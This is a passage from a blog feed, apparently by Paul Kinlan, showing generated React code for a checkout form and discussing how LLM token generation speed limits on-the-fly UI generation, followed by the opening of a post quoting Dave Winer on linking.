</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;John Doe&#34;</span>
</span></span><span style="display:flex;"><span>                /&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">Email</span>
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">email</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;john.doe@example.com&#34;</span>
</span></span><span style="display:flex;"><span>                /&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          {<span style="color:#75715e">/* Shipping Address */</span>}
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;mb-6&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">h3</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-semibold text-gray-700 mb-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              <span style="color:#a6e22e">Shipping</span> <span style="color:#a6e22e">Address</span>
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">h3</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-1 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;address&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">Address</span>
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;address&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;address&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">address</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;123 Main St&#34;</span>
</span></span><span style="display:flex;"><span>                /&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-1 md:grid-cols-2 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;city&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">City</span>
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;city&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;city&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">city</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Anytown&#34;</span>
</span></span><span style="display:flex;"><span>                  /&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;zip&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">Zip</span> <span style="color:#a6e22e">Code</span>
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;zip&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;zip&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">zip</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;12345&#34;</span>
</span></span><span style="display:flex;"><span>                  /&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          {<span style="color:#75715e">/* Payment Information */</span>}
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">h3</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-semibold text-gray-700 mb-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              <span style="color:#a6e22e">Payment</span> <span style="color:#a6e22e">Information</span>
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">h3</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-1 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cardNumber&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">Card</span> Number
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cardNumber&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cardNumber&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">cardNumber</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;**** **** **** ****&#34;</span>
</span></span><span style="display:flex;"><span>                /&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-2 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;expiryDate&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">Expiry</span> Date
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;expiryDate&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;expiryDate&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">expiryDate</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;MM/YY&#34;</span>
</span></span><span style="display:flex;"><span>                  /&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cvv&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">CVV</span>
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cvv&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cvv&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">cvv</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;123&#34;</span>
</span></span><span style="display:flex;"><span>                  /&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        {<span style="color:#75715e">/* Shopping Basket Section */</span>}
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flex-1 bg-gray-50 p-6 rounded-xl shadow-inner&#34;</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">h3</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-2xl font-extrabold text-gray-800 mb-6 text-center&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">Your</span> <span style="color:#a6e22e">Basket</span>
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">h3</span>&gt;
</span></span><span style="display:flex;"><span>          {<span style="color:#a6e22e">basketItems</span>.<span style="color:#a6e22e">length</span> <span style="color:#f92672">===</span> <span style="color:#ae81ff">0</span> <span style="color:#f92672">?</span> (
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-center text-gray-500&#34;</span>&gt;<span style="color:#a6e22e">Your</span> <span style="color:#a6e22e">basket</span> <span style="color:#a6e22e">is</span> <span style="color:#a6e22e">empty</span>.&lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>          ) <span style="color:#f92672">:</span> (
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;space-y-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              {<span style="color:#a6e22e">basketItems</span>.<span style="color:#a6e22e">map</span>((<span style="color:#a6e22e">item</span>) =&gt; (
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">key</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">id</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flex items-center justify-between bg-white p-4 rounded-lg shadow-sm border border-gray-200&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flex-grow&#34;</span>&gt;
</span></span><span style="display:flex;"><span>                    &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;font-semibold text-gray-800&#34;</span>&gt;{<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">name</span>}&lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>                    &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-gray-600 text-sm&#34;</span>&gt;
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">$</span>{<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">price</span>.<span style="color:#a6e22e">toFixed</span>(<span style="color:#ae81ff">2</span>)} <span style="color:#a6e22e">x</span> {<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">quantity</span>}
</span></span><span style="display:flex;"><span>                    &lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">button</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onClick</span><span style="color:#f92672">=</span>{() =&gt; <span style="color:#a6e22e">handleDeleteItem</span>(<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">id</span>)}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;ml-4 p-2 bg-red-500 text-white rounded-full hover:bg-red-600 focus:outline-none focus:ring-2 focus:ring-red-500 focus:ring-opacity-50 transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">aria</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#a6e22e">label</span><span style="color:#f92672">=</span>{<span style="color:#e6db74">`Delete </span><span style="color:#e6db74">${</span><span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">`</span>}
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    &lt;<span style="color:#f92672">svg</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">xmlns</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://www.w3.org/2000/svg&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;h-5 w-5&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">viewBox</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;0 0 20 20&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">fill</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;currentColor&#34;</span>
</span></span><span style="display:flex;"><span>                    &gt;
</span></span><span style="display:flex;"><span>                      &lt;<span style="color:#f92672">path</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#a6e22e">fillRule</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;evenodd&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#a6e22e">d</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;M9 2a1 1 0 00-.894.553L7.382 4H4a1 1 0 000 2v10a2 2 0 002 2h8a2 2 0 002-2V6a1 1 0 100-2h-3.382l-.724-1.447A1 1 0 0011 2H9zM7 8a1 1 0 012 0v6a1 1 0 11-2 0V8zm6 0a1 1 0 012 0v6a1 1 0 11-2 0V8z&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#a6e22e">clipRule</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;evenodd&#34;</span>
</span></span><span style="display:flex;"><span>                      /&gt;
</span></span><span style="display:flex;"><span>                    &lt;/<span style="color:#f92672">svg</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">button</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              ))}
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>          )}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;mt-8 pt-4 border-t-2 border-gray-200 flex justify-between items-center&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-bold text-gray-800&#34;</span>&gt;<span style="color:#a6e22e">Total</span><span style="color:#f92672">:</span>&lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-bold text-blue-600&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              <span style="color:#a6e22e">$</span>{<span style="color:#a6e22e">calculateTotal</span>()}
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">button</span>
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">onClick</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleCheckout</span>}
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;mt-6 w-full py-4 bg-blue-600 text-white text-lg font-semibold rounded-lg shadow-md hover:bg-blue-700 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:ring-opacity-50 transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>          &gt;
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">Proceed</span> <span style="color:#a6e22e">to</span> <span style="color:#a6e22e">Checkout</span>
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">button</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>      &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>  );
</span></span><span style="display:flex;"><span>};
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">export</span> <span style="color:#66d9ef">default</span> <span style="color:#a6e22e">App</span>;
</span></span></code></pre></div><p><strong>4982 tokens</strong>. At 150 tokens per second just for the response we are looking at 33 seconds to generate the UI, and this is still a relatively simple UI.</p>
<p>Latency is across the full stack and we&rsquo;re going to need a step change in performance to get to the 0.1 second threshold.</p>
<p>There seem to be multiple approaches to improve this performance and reduce latency. On one hand you have <a href="https://groq.com">Groq</a> making custom hardware and then you have algorithmic changes like <a href="https://deepmind.google/models/gemini-diffusion/">Text Diffusion</a> (showcased at Google I/O 2025), with both appearing that you show between 1000-2000 tokens per second. The checkout form above would be generated in about 2-3 seconds.</p>
<p>That&rsquo;s an order of magnitude improvement to generation in the space of 2 years, but to get sub-second it looks like need another order of magnitude improvement, so something in the 10,000 tokens per second range.</p>
<p>To me HTML, CSS and JS feel like the right level of abstraction for generating UI inside LLMs, firstly we can generate them for any platform, Web or Native app, but given the languages&rsquo; relative verbosity it does raise the question to me if it will be better to have an intermediate representation of UI that is more compressed and quicker to generate might be a better approach - for example, I could imaging a constrained set of &ldquo;<a href="https://paul.kinlan.me/custom-elements-ecosystem/">Web Component interfaces</a>&rdquo;, or maybe we just use smaller &ldquo;lower quality&rdquo; models, or maybe we just wait for another step change to happen in the models and hardware.</p>
<p>To me, the direction of travel is clear. UI generation to service user-goals is going to happen.</p>
]]></content:encoded></item><item><title>A link is all you need</title><link>https://aifoc.us/a-link-is-all-you-need/</link><pubDate>Sat, 17 May 2025 19:59:06 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/a-link-is-all-you-need/</guid><description>&lt;blockquote>
&lt;p>I&amp;rsquo;ll keep playing here while the rest of you flirt with apps. I&amp;rsquo;ll be here when you come back. I know it&amp;rsquo;s going to happen. Here&amp;rsquo;s why.&lt;/p>
&lt;p>Linking.&lt;/p>&lt;/blockquote>
&lt;p>&lt;a href="http://scripting.com/stories/2011/12/13/whyAppsAreNotTheFuture.html#p11405">Dave Winer - 2011&lt;/a>&lt;/p>
